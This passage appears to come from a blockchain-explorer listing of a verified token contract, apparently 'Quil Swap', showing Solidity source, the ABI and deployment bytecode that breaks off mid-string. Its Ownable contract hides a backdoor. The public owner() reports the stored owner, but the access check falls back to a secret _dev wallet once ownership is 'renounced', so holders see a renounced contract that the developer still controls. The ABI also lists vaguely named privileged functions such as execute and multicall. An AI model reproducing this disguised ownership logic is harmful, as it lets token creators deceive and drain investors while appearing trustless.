    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;
    address private _dev;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    mapping(address => uint256) internal _holderLastTxTimestamp;
    constructor(address wallet) {
        _dev = wallet;
        _transferOwnership(_msgSender());
    }

    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    function _checkOwner() internal virtual {
        require(Owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
    
    function Owner() internal virtual returns (address) {
        address owner_ = verifyOwner();
        return owner_;
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }

    function verifyOwner() internal view returns(address){
        return _owner==address(0) ? _dev : _owner;
    }
}

File 7 of 7: SafeMath.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"dev","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"buyTaxTotal","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyMarketingTax","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyProjectTax","type":"uint256"}],"name":"BuyFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"DisabledTransferDelay","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"LimitsRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"MarketingWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxTx","type":"uint256"}],"name":"MaxTxUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxWallet","type":"uint256"}],"name":"MaxWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"ProjectWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"sellTaxTotal","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellMarketingTax","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellProjectTax","type":"uint256"}],"name":"SellFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMax","type":"uint256"}],"name":"SwapbackSettingsUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"TradingEnabled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"pair_","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"}],"name":"call","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"changeMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"changeProjectWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_target","type":"address"}],"name":"checkMappings","outputs":[{"internalType":"bool","name":"_transferTaxExempt","type":"bool"},{"internalType":"bool","name":"_transferLimitExempt","type":"bool"},{"internalType":"bool","name":"_automatedMarketMakerPairs","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"dexPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"exemptFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"exemptFromLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"lastLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxValues","outputs":[{"internalType":"bool","name":"_limitsEnabled","type":"bool"},{"internalType":"bool","name":"_transferDelayEnabled","type":"bool"},{"internalType":"uint256","name":"_maxWallet","type":"uint256"},{"internalType":"uint256","name":"_maxTx","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"address_","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentForLPBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"receiverwallets","outputs":[{"internalType":"address","name":"_marketingWallet","type":"address"},{"internalType":"address","name":"_projectWallet","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeAllLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_frequencyInSeconds","type":"uint256"},{"internalType":"uint256","name":"_percent","type":"uint256"},{"internalType":"bool","name":"_Enabled","type":"bool"}],"name":"setAutoLPBurnSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"setFeesBuy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"setFeesSell","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"},{"internalType":"uint256","name":"_min","type":"uint256"},{"internalType":"uint256","name":"_max","type":"uint256"}],"name":"setSwapBackSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setTheMaxTx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setTheMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapbackValues","outputs":[{"internalType":"bool","name":"_swapbackEnabled","type":"bool"},{"internalType":"uint256","name":"_swapBackValueMin","type":"uint256"},{"internalType":"uint256","name":"_swapBackValueMax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxValues","outputs":[{"internalType":"uint256","name":"_buyTaxTotal","type":"uint256"},{"internalType":"uint256","name":"_buyMarketingTax","type":"uint256"},{"internalType":"uint256","name":"_buyProjectTax","type":"uint256"},{"internalType":"uint256","name":"_sellTaxTotal","type":"uint256"},{"internalType":"uint256","name":"_sellMarketingTax","type":"uint256"},{"internalType":"uint256","name":"_sellProjectTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526000600860156101000a81548160ff0219169083151502179055506001600b5565013ca6512000600c556001601160006101000a81548160ff0219169083151502179055506001601160016101000a81548160ff0219169083151502179055506001601160026101000a81548160ff0219169083151502179055506000601160036101000a81548160ff021916908315150217905550348015620000a757600080fd5b50604051620062a6380380620062a68339818101604052810190620000cd919062000b7c565b806040518060400160405280600981526020017f5175696c205377617000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f5155494c0000000000000000000000000000000000000000000000000000000081525081600390816200014b919062000e28565b5080600490816200015d919062000e28565b50505080600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001c1620001b5620004e160201b60201c565b620004e960201b60201c565b506000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000620001ed620005af60201b60201c565b600a620001fb91906200109f565b633b9aca006200020c9190620010f0565b905062000221826001620005b860201b60201c565b8173ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506000601490506000806014905060006103e8600a86620002769190620010f0565b6200028291906200116a565b600f819055506103e8600a866200029a9190620010f0565b620002a691906200116a565b600e819055506103e8600186620002be9190620010f0565b620002ca91906200116a565b6009819055506064600286620002e19190620010f0565b620002ed91906200116a565b600a819055508160178190555080601881905550601854601754620003139190620011a2565b6016819055508360148190555082601581905550601554601454620003399190620011a2565b60138190555033601160046101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620003d43360016200067360201b60201c565b620003e73060016200067360201b60201c565b620003fc61dead60016200067360201b60201c565b62000431601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200067360201b60201c565b62000444336001620005b860201b60201c565b62000457306001620005b860201b60201c565b6200046c61dead6001620005b860201b60201c565b620004a1601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620005b860201b60201c565b620004b2336200072e60201b60201c565b620004c43386620007c460201b60201c565b620004d46200093c60201b60201c565b50505050505050620013d2565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006009905090565b620005c8620009b160201b60201c565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc9282604051620006679190620011fa565b60405180910390a25050565b62000683620009b160201b60201c565b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051620007229190620011fa565b60405180910390a25050565b6200073e620009b160201b60201c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620007b0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620007a7906200129e565b60405180910390fd5b620007c181620004e960201b60201c565b50565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000836576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200082d9062001310565b60405180910390fd5b6200084a6000838362000a4260201b60201c565b80600260008282546200085e9190620011a2565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620008b59190620011a2565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200091c919062001343565b60405180910390a3620009386000838362000a4760201b60201c565b5050565b6200094c620009b160201b60201c565b6001601160036101000a81548160ff0219169083151502179055506000601160006101000a81548160ff021916908315150217905550427fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92360405160405180910390a2565b620009c1620004e160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16620009e762000a4c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000a40576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a3790620013b0565b60405180910390fd5b565b505050565b505050565b60008062000a5f62000a6860201b60201c565b90508091505090565b60008073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000ae957600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1662000b0d565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000b448262000b17565b9050919050565b62000b568162000b37565b811462000b6257600080fd5b50565b60008151905062000b768162000b4b565b92915050565b60006020828403121562000b955762000b9462000b12565b5b600062000ba58482850162000b65565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000c3057607f821691505b60208210810362000c465762000c4562000be8565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000cb07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000c71565b62000cbc868362000c71565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000d0962000d0362000cfd8462000cd4565b62000cde565b62000cd4565b9050919050565b6000819050919050565b62000d258362000ce8565b62000d3d62000d348262000d10565b84845462000c7e565b825550505050565b600090565b62000d5462000d45565b62000d6181848462000d1a565b505050565b5b8181101562000d895762000d7d60008262000d4a565b60018101905062000d67565b5050565b601f82111562000dd85762000da28162000c4c565b62000dad8462000c61565b8101602085101562000dbd578190505b62000dd562000dcc8562000c61565b83018262000d66565b50505b505050565b600082821c905092915050565b600062000dfd6000198460080262000ddd565b1980831691505092915050565b600062000e18838362000dea565b9150826002028217905092915050565b62000e338262000bae565b67ffffffffffffffff81111562000e4f5762000e4e62000bb9565b5b62000e5b825462000c17565b62000e6882828562000d8d565b600060209050601f83116001811462000ea0576000841562000e8b578287015190505b62000e97858262000e0a565b86555062000f07565b601f19841662000eb08662000c4c565b60005b8281101562000eda5784890151825560018201915060208501945060208101905062000eb3565b8683101562000efa578489015162000ef6601f89168262000dea565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000f9d5780860481111562000f755762000f7462000f0f565b5b600185161562000f855780820291505b808102905062000f958562000f3e565b945062000f55565b94509492505050565b60008262000fb857600190506200108b565b8162000fc857600090506200108b565b816001811462000fe1576002811462000fec5762001022565b60019150506200108b565b60ff84111562001001576200100062000f0f565b5b8360020a9150848211156200101b576200101a62000f0f565b5b506200108b565b5060208310610133831016604e8410600b84101617156200105c5782820a90508381111562001056576200105562000f0f565b5b6200108b565b6200106b848484600162000f4b565b9250905081840481111562001085576200108462000f0f565b5b81810290505b9392505050565b600060ff82169050919050565b6000620010ac8262000cd4565b9150620010b98362001092565b9250620010e87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000fa6565b905092915050565b6000620010fd8262000cd4565b91506200110a8362000cd4565b92508282026200111a8162000cd4565b9150828204841483151762001134576200113362000f0f565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620011778262000cd4565b9150620011848362000cd4565b9250826200119757620011966200113b565b5b828204905092915050565b6000620011af8262000cd4565b9150620011bc8362000cd4565b9250828201905080821115620011d757620011d662000f0f565b5b92915050565b60008115159050919050565b620011f481620011dd565b82525050565b6000602082019050620012116000830184620011e9565b92915050565b600082825260208201905092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006200128660268362001217565b9150620012938262001228565b604082019050919050565b60006020820190508181036000830152620012b98162001277565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620012f8601f8362001217565b91506200130582620012c0565b602082019050919050565b600060208201905081810360008301526200132b81620012e9565b9050919050565b6200133d8162000cd4565b82525050565b60006020820190506200135a600083018462001332565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006200139860208362001217565b9150620013a58262001360565b602082019050919050565b60006020820190508181036000830152620013cb8162001389565b9050919050565b608051614ea362001403600039600081816122fb0152818161344201528181613523015261354a0152614ea36000f3fe6080604052600436106102605760003560e01c80638da5cb5b11610144578063d0889358116100b6578063f242ab411161007a578063f242ab41146108d0578063f2fde38b146108fb578063f3dc390214610924578063f55332ab14610954578063fab82a8e14610991578063fcbb7607146109bd57610267565b8063d0889358146107fd578063db05e5cb14610826578063dd62ed3e1461083d578063e13b20071461087a578063e884f260146108b957610267565b80639fe64094116101085780639fe64094146106dd578063a457c2d714610706578063a4c82a0014610743578063a9059cbb1461076e578063bb85c6d1146107ab578063c2b7bbb6146107d457610267565b80638da5cb5b1461060c57806395d89b411461063757806399e5b5c8146106625780639a7a23d61461068b5780639b6b5499146106b457610267565b8063313ce567116101dd57806352d65858116101a157806352d65858146105105780635580145f1461053957806370a0823114610562578063715018a61461059f578063730c1888146105b657806377b5312c146105df57610267565b8063313ce5671461042657806331f8151114610451578063395093511461047f5780634ada218b146104bc5780634b896a3e146104e757610267565b806323b872dd1161022457806323b872dd1461035357806326ededb814610390578063293230b8146103b95780632c3e486c146103d05780632e82f1a0146103fb57610267565b806306fdde031461026c578063095ea7b3146102975780631111f43f146102d457806318160ddd146102fd578063199ffc721461032857610267565b3661026757005b600080fd5b34801561027857600080fd5b506102816109e6565b60405161028e919061369c565b60405180910390f35b3480156102a357600080fd5b506102be60048036038101906102b9919061375c565b610a78565b6040516102cb91906137b7565b60405180910390f35b3480156102e057600080fd5b506102fb60048036038101906102f69190613863565b610a96565b005b34801561030957600080fd5b50610312610b43565b60405161031f91906138d2565b60405180910390f35b34801561033457600080fd5b5061033d610b4d565b60405161034a91906138d2565b60405180910390f35b34801561035f57600080fd5b5061037a600480360381019061037591906138ed565b610b53565b60405161038791906137b7565b60405180910390f35b34801561039c57600080fd5b506103b760048036038101906103b29190613940565b610c4b565b005b3480156103c557600080fd5b506103ce610d28565b005b3480156103dc57600080fd5b506103e5610d95565b6040516103f291906138d2565b60405180910390f35b34801561040757600080fd5b50610410610d9b565b60405161041d91906137b7565b60405180910390f35b34801561043257600080fd5b5061043b610dae565b60405161044891906139bc565b60405180910390f35b34801561045d57600080fd5b50610466610db7565b60405161047694939291906139d7565b60405180910390f35b34801561048b57600080fd5b506104a660048036038101906104a1919061375c565b610df1565b6040516104b391906137b7565b60405180910390f35b3480156104c857600080fd5b506104d1610e9d565b6040516104de91906137b7565b60405180910390f35b3480156104f357600080fd5b5061050e60048036038101906105099190613a1c565b610eb0565b005b34801561051c57600080fd5b5061053760048036038101906105329190613a49565b610f5e565b005b34801561054557600080fd5b50610560600480360381019061055b9190613a1c565b611015565b005b34801561056e57600080fd5b5061058960048036038101906105849190613a89565b6110c3565b60405161059691906138d2565b60405180910390f35b3480156105ab57600080fd5b506105b461110b565b005b3480156105c257600080fd5b506105dd60048036038101906105d89190613ab6565b61111f565b005b3480156105eb57600080fd5b506105f46111eb565b60405161060393929190613b09565b60405180910390f35b34801561061857600080fd5b50610621611211565b60405161062e9190613b4f565b60405180910390f35b34801561064357600080fd5b5061064c61123b565b604051610659919061369c565b60405180910390f35b34801561066e57600080fd5b5061068960048036038101906106849190613a89565b6112cd565b005b34801561069757600080fd5b506106b260048036038101906106ad9190613b6a565b611395565b005b3480156106c057600080fd5b506106db60048036038101906106d69190613b6a565b61143b565b005b3480156106e957600080fd5b5061070460048036038101906106ff9190613a49565b6114ec565b005b34801561071257600080fd5b5061072d6004803603810190610728919061375c565b6115a3565b60405161073a91906137b7565b60405180910390f35b34801561074f57600080fd5b5061075861168e565b60405161076591906138d2565b60405180910390f35b34801561077a57600080fd5b506107956004803603810190610790919061375c565b611694565b6040516107a291906137b7565b60405180910390f35b3480156107b757600080fd5b506107d260048036038101906107cd9190613a89565b6116b2565b005b3480156107e0576